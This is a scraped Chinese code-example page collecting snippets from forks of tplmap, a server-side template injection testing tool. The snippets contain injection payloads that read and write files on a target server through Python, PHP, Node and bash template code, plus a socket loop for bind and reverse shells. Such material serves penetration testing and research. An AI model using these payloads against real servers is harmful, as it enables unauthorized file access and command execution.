本文整理汇总了Python中utils.loggers.log.info函数的典型用法代码示例。如果您正苦于以下问题:Python info函数的具体用法?Python info怎么用?Python info使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了info函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: read
def read(self, remote_path):
action = self.actions.get('read', {})
payload = action.get('read')
call_name = action.get('call', 'render')
# Skip if something is missing or call function is not set
if not action or not payload or not call_name or not hasattr(self, call_name):
return
# Get remote file md5
md5_remote = self.md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
execution_code = payload % ({ 'path' : remote_path })
data_b64encoded = getattr(self, call_name)(
code = execution_code,
)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
开发者ID:epinna,项目名称:tplmap,代码行数:30,代码来源:plugin.py
示例2: forward_data
def forward_data(self):
log.info("Incoming connection accepted")
self.socket.setblocking(0)
while(1):
read_ready, write_ready, in_error = select.select(
[self.socket, sys.stdin], [], [self.socket, sys.stdin])
try:
buffer = self.socket.recv(100)
while(buffer != ''):
self.socket_state = True
sys.stdout.write(buffer)
sys.stdout.flush()
buffer = self.socket.recv(100)
if(buffer == ''):
return
except socket.error:
pass
while(1):
r, w, e = select.select([sys.stdin], [], [], 0)
if(len(r) == 0):
break
c = sys.stdin.read(1)
if(c == ''):
return
if(self.socket.sendall(c) != None):
return
开发者ID:epinna,项目名称:tplmap,代码行数:32,代码来源:tcpserver.py
示例3: _print_injection_summary
def _print_injection_summary(channel):
prefix = channel.data.get('prefix', '').replace('\n', '\\n')
render_tag = channel.data.get('render_tag').replace('\n', '\\n') % ({'payload' : '' })
suffix = channel.data.get('suffix', '').replace('\n', '\\n')
log.info("""Tplmap identified the following injection point:
Engine: %(engine)s
Template: %(prefix)s%(render_tag)s%(suffix)s
Context: %(context)s
OS: %(os)s
Capabilities:
Code evaluation: %(eval)s
OS command execution: %(exec)s
File write: %(write)s
File read: %(read)s
""" % ({
'prefix': prefix,
'render_tag': render_tag,
'suffix': suffix,
'context': 'text' if (not prefix and not suffix) else 'code',
'engine': channel.data.get('engine').capitalize(),
'os': channel.data.get('os', 'undetected'),
'eval': 'no' if not channel.data.get('eval') else 'yes, %s code' % (channel.data.get('eval')),
'exec': 'no' if not channel.data.get('exec') else 'yes',
'write': 'no' if not channel.data.get('write') else 'yes',
'read': 'no' if not channel.data.get('read') else 'yes',
}))
开发者ID:anhilo,项目名称:tplmap,代码行数:29,代码来源:checks.py
示例4: _detect_dust
def _detect_dust(self):
# Print what it's going to be tested
log.info('%s plugin is testing rendering' % (
self.plugin,
)
)
for prefix, suffix in self._generate_contexts():
payload = 'AA{!c!}AA'
header_rand = rand.randint_n(10)
header = str(header_rand)
trailer_rand = rand.randint_n(10)
trailer = str(trailer_rand)
if 'AAAA' == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('header', '%s')
self.set('trailer', '%s')
self.set('prefix', prefix)
self.set('suffix', suffix)
self.set('engine', self.plugin.lower())
self.set('language', self.language)
return
开发者ID:epinna,项目名称:tplmap,代码行数:33,代码来源:dust.py
示例5: detect_template_injection
def detect_template_injection(channel, plugins = plugins):
# Loop manually the channel.injs modifying channel's inj_idx
for i in xrange(len(channel.injs)):
log.info("Testing if %s parameter '%s' is injectable" % (
channel.injs[channel.inj_idx]['field'],
channel.injs[channel.inj_idx]['param']
)
)
current_plugin = None
# Iterate all the available plugins until
# the first template engine is detected.
for plugin in plugins:
current_plugin = plugin(channel)
# Skip if user specify a specific --engine
if channel.args.get('engine') and channel.args.get('engine').lower() != current_plugin.plugin.lower():
continue
current_plugin.detect()
if channel.data.get('engine'):
return current_plugin
channel.inj_idx += 1
开发者ID:m-starke,项目名称:tplmap,代码行数:29,代码来源:checks.py
示例6: _print_injection_summary
def _print_injection_summary(channel):
prefix = channel.data.get('prefix', '').replace('\n', '\\n')
render = channel.data.get('render', '%(code)s').replace('\n', '\\n') % ({'code' : '*' })
suffix = channel.data.get('suffix', '').replace('\n', '\\n')
if channel.data.get('evaluate_blind'):
evaluation = 'ok, %s code (blind)' % (channel.data.get('language'))
elif channel.data.get('evaluate'):
evaluation = 'ok, %s code' % (channel.data.get('language'))
else:
evaluation = 'no'
if channel.data.get('execute_blind'):
execution = 'ok (blind)'
elif channel.data.get('execute'):
execution = 'ok'
else:
execution = 'no'
if channel.data.get('write'):
if channel.data.get('blind'):
writing = 'ok (blind)'
else:
writing = 'ok'
else:
writing = 'no'
log.info("""Tplmap identified the following injection point:
%(method)s parameter: %(parameter)s
Engine: %(engine)s
Injection: %(prefix)s%(render)s%(suffix)s
Context: %(context)s
OS: %(os)s
Technique: %(injtype)s
Capabilities:
Shell command execution: %(execute)s
Bind and reverse shell: %(bind_shell)s
File write: %(write)s
File read: %(read)s
Code evaluation: %(evaluate)s
""" % ({
'prefix': prefix,
'render': render,
'suffix': suffix,
'context': 'text' if (not prefix and not suffix) else 'code',
'engine': channel.data.get('engine').capitalize(),
'os': channel.data.get('os', 'undetected'),
'injtype' : 'blind' if channel.data.get('blind') else 'render',
'evaluate': evaluation,
'execute': execution,
'write': writing,
'read': 'no' if not channel.data.get('read') else 'ok',
'bind_shell': 'no' if not channel.data.get('bind_shell') else 'ok',
'method': channel.injs[channel.inj_idx]['field'],
'parameter': channel.injs[channel.inj_idx]['param']
}))
开发者ID:m-starke,项目名称:tplmap,代码行数:59,代码来源:checks.py
示例7: _parse_get
def _parse_get(self):
params_dict_list = urlparse.parse_qs(urlparse.urlsplit(self.url).query)
for param, value_list in params_dict_list.items():
self.get_params[param] = value_list
if any(x for x in value_list if '*' in x):
self.get_placeholders.append(param)
log.info('Found placeholder in GET parameter \'%s\'' % param)
开发者ID:HMSH00D,项目名称:tplmap,代码行数:10,代码来源:channel.py
示例8: _print_injection_summary
def _print_injection_summary(channel):
prefix = channel.data.get('prefix', '').replace('\n', '\\n')
render = channel.data.get('render', '%(code)s').replace('\n', '\\n') % ({'code' : '*' })
suffix = channel.data.get('suffix', '').replace('\n', '\\n')
idiom = channel.data.get('evaluate')
if idiom:
evaluation = 'yes, %s code' % (idiom)
if channel.data.get('evaluate_blind'):
evaluation += ' (blind)'
else:
evaluation = 'no'
# Handle execute_blind first since even if it's blind, execute is set as well
# TODO: fix this? less ambiguity
if channel.data.get('execute_blind'):
execution = 'yes (blind)'
elif channel.data.get('execute'):
execution = 'yes'
else:
execution = 'no'
log.info("""Tplmap identified the following injection point:
Engine: %(engine)s
Injection: %(prefix)s%(render)s%(suffix)s
Context: %(context)s
OS: %(os)s
Technique: %(injtype)s
Capabilities:
Code evaluation: %(evaluate)s
OS command execution: %(execute)s
File write: %(write)s
File read: %(read)s
""" % ({
'prefix': prefix,
'render': render,
'suffix': suffix,
'context': 'text' if (not prefix and not suffix) else 'code',
'engine': channel.data.get('engine').capitalize(),
'os': channel.data.get('os', 'undetected'),
'injtype' : 'blind' if channel.data.get('blind') else 'render',
'evaluate': evaluation,
'execute': execution,
'write': 'no' if not channel.data.get('write') else 'yes',
'read': 'no' if not channel.data.get('read') else 'yes',
}))
开发者ID:xukaiyi,项目名称:tplmap,代码行数:48,代码来源:checks.py
示例9: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""print(base64_encode(file_get_contents("%s")));""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
开发者ID:Hamid-K,项目名称:tplmap,代码行数:18,代码来源:smarty.py
示例10: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""__import__("base64").b64encode(open("%s", "rb").read())""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
开发者ID:Hamid-K,项目名称:tplmap,代码行数:18,代码来源:jinja2.py
示例11: _detect_blind
def _detect_blind(self):
action = self.actions.get('blind', {})
payload_true = action.get('test_bool_true')
payload_false = action.get('test_bool_false')
call_name = action.get('call', 'inject')
# Skip if something is missing or call function is not set
if not action or not payload_true or not payload_false or not call_name or not hasattr(self, call_name):
return
# Print what it's going to be tested
log.info('%s plugin is testing blind injection' % (
self.plugin
)
)
for prefix, suffix in self._generate_contexts():
# Conduct a true-false test
if not getattr(self, call_name)(
code = payload_true,
prefix = prefix,
suffix = suffix,
blind = True
):
continue
detail = {'blind_true':self._inject_verbose}
if getattr(self, call_name)(
code = payload_false,
prefix = prefix,
suffix = suffix,
blind = True
):
continue
detail['blind_false'] = self._inject_verbose
detail['average'] = sum(self.render_req_tm)/len(self.render_req_tm)
# We can assume here blind is true
self.set('blind', True)
self.set('prefix', prefix)
self.set('suffix', suffix)
self.channel.detected('blind', detail)
return
开发者ID:epinna,项目名称:tplmap,代码行数:44,代码来源:plugin.py
示例12: _detect_render
def _detect_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.info('%s plugin is testing rendering with tag %s' % (
self.plugin,
repr(render_action.get('render') % ({'code' : '*' })),
)
)
for prefix, suffix in self._generate_contexts():
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
header_rand = rand.randint_n(10)
header = render_action.get('header') % ({ 'header' : header_rand })
trailer_rand = rand.randint_n(10)
trailer = render_action.get('trailer') % ({ 'trailer' : trailer_rand })
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('render', render_action.get('render'))
self.set('header', render_action.get('header'))
self.set('trailer', render_action.get('trailer'))
self.set('prefix', prefix)
self.set('suffix', suffix)
return
开发者ID:CaineQT,项目名称:tplmap,代码行数:42,代码来源:plugin.py
示例13: write
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.evaluate("""open("%s", 'w').close()""" % remote_path)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64.urlsafe_b64encode(chunk)
self.evaluate("""open("%s", 'ab+').write(__import__("base64").urlsafe_b64decode('%s'))""" % (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File uploaded correctly')
开发者ID:bogiesoft,项目名称:tplmap,代码行数:20,代码来源:jinja2.py
示例14: write
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.execute("bash -c {echo,-n,}>%s" % (remote_path))
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64encode(chunk)
self.execute("bash -c {base64,--decode}<<<%s>>%s" % (chunk_b64, remote_path))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File uploaded correctly')
开发者ID:anhilo,项目名称:tplmap,代码行数:20,代码来源:freemarker.py
示例15: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
# Using base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.execute('bash -c base64<%s' % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
开发者ID:Hamid-K,项目名称:tplmap,代码行数:20,代码来源:freemarker.py
示例16: read
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
# Use base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.inject("""= global.process.mainModule.require('fs').readFileSync('%s').toString('base64')""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
开发者ID:Hamid-K,项目名称:tplmap,代码行数:21,代码来源:jade.py
示例17: _detect_unreliable_render
def _detect_unreliable_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.debug('%s plugin is testing unreliable rendering on text context' % (
self.plugin
)
)
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
# Probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = '',
trailer = '',
header_rand = None,
trailer_rand = None,
prefix = '',
suffix = ''
):
self.set('render', render_action.get('render'))
# Print if the first found unreliable renode
if not self.get('unreliable'):
log.info('%s plugin has detected unreliable rendering with tag %s, skipping' % (
self.plugin,
repr(self.get('render') % ({'code' : '*' })))
)
self.set('unreliable', self.plugin)
return
开发者ID:CaineQT,项目名称:tplmap,代码行数:40,代码来源:plugin.py
示例18: _detect_unreliable_render
def _detect_unreliable_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.debug('%s plugin is testing unreliable rendering on text context' % (
self.plugin
)
)
# Prepare base operation to be evalued server-side
expected = render_action.get('test_render_expected')
payload = render_action.get('test_render')
# Probe with payload wrapped by header and trailer, no suffex or prefix.
# Test if contained, since the page contains other garbage
if expected in self.render(
code = payload,
header = '',
trailer = '',
header_rand = 0,
trailer_rand = 0,
prefix = '',
suffix = ''
):
# Print if the first found unreliable renode
if not self.get('unreliable_render'):
log.info('%s plugin has detected unreliable rendering with tag %s, skipping' % (
self.plugin,
repr(render_action.get('render') % ({'code' : '*' })))
)
self.set('unreliable_render', render_action.get('render'))
self.set('unreliable', self.plugin)
return
开发者ID:epinna,项目名称:tplmap,代码行数:39,代码来源:plugin.py
示例19: detect
def detect(self):
# Start detection
self._detect_render()
# If render is not set, check unreliable render
if self.get('render') == None:
self._detect_unreliable_render()
# Else, print and execute rendered_detected()
else:
# If here, the rendering is confirmed
prefix = self.get('prefix', '')
render = self.get('render', '%(code)s') % ({'code' : '*' })
suffix = self.get('suffix', '')
log.info('%s plugin has confirmed injection with tag \'%s%s%s\'' % (
self.plugin,
repr(prefix).strip("'"),
repr(render).strip("'"),
repr(suffix).strip("'"),
)
)
# Set the environment
self.rendered_detected()
# Manage blind injection only if render detection has failed
if not self.get('engine'):
self._detect_blind()
if self.get('blind'):
log.info('%s plugin has confirmed blind injection' % (self.plugin))
# Set the environment
self.blind_detected()
开发者ID:CaineQT,项目名称:tplmap,代码行数:38,代码来源:plugin.py
示例20: detect
def detect(self):
context_num = len([c for c in self.contexts if (c.get('level') <= self.channel.args.get('level'))])
# Print what it's going to be tested
log.info('Testing reflection on %s engine with tag %s%s' % (
self.plugin,
self.render_tag.replace('\n', '\\n') % ({'payload' : '*' }),
' and %i variation%s' % (context_num, 's' if context_num > 1 else '') if context_num else ''
)
)
# If no weak reflection has been detected so far
if not self.get('render_tag'):
# Start detection
self._detect_context()
# Print message if header or trailer are still unset
if self.get('header_tag') == None or self.get('trailer_tag') == None:
if self.get('render_tag'):
log.info('Detected unreliable reflection with tag %s, continuing' % (
self.get('render_tag').replace('\n', '\\n')) % ({'payload' : '*' })
)
# If tags found previously are the same as current plugin, skip context detection
if not (
self.get('render_tag') == self.render_tag and
self.get('header_tag') == self.header_tag and
self.get('trailer_tag') == self.trailer_tag
):
self._detect_context()
# Exit if header or trailer are still different
if not (
self.get('render_tag') == self.render_tag and
self.get('header_tag') == self.header_tag and
self.get('trailer_tag') == self.trailer_tag
):
return
prefix = self.get('prefix', '').replace('\n', '\\n')
render_tag = self.get('render_tag').replace('\n', '\\n') % ({'payload' : '*' })
suffix = self.get('suffix', '').replace('\n', '\\n')
log.info('Confirmed reflection with tag \'%s%s%s\' by %s plugin' % (prefix, render_tag, suffix, self.plugin))
self.detect_engine()
# Return if engine is still unset
if not self.get('engine'):
return
self.detect_eval()
self.detect_exec()
self.detect_write()
self.detect_read()
开发者ID:awesome-security,项目名称:tplmap,代码行数:57,代码来源:check.py
注:本文中的utils.loggers.log.info函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
客服电话
APP下载
官方微信
请发表评论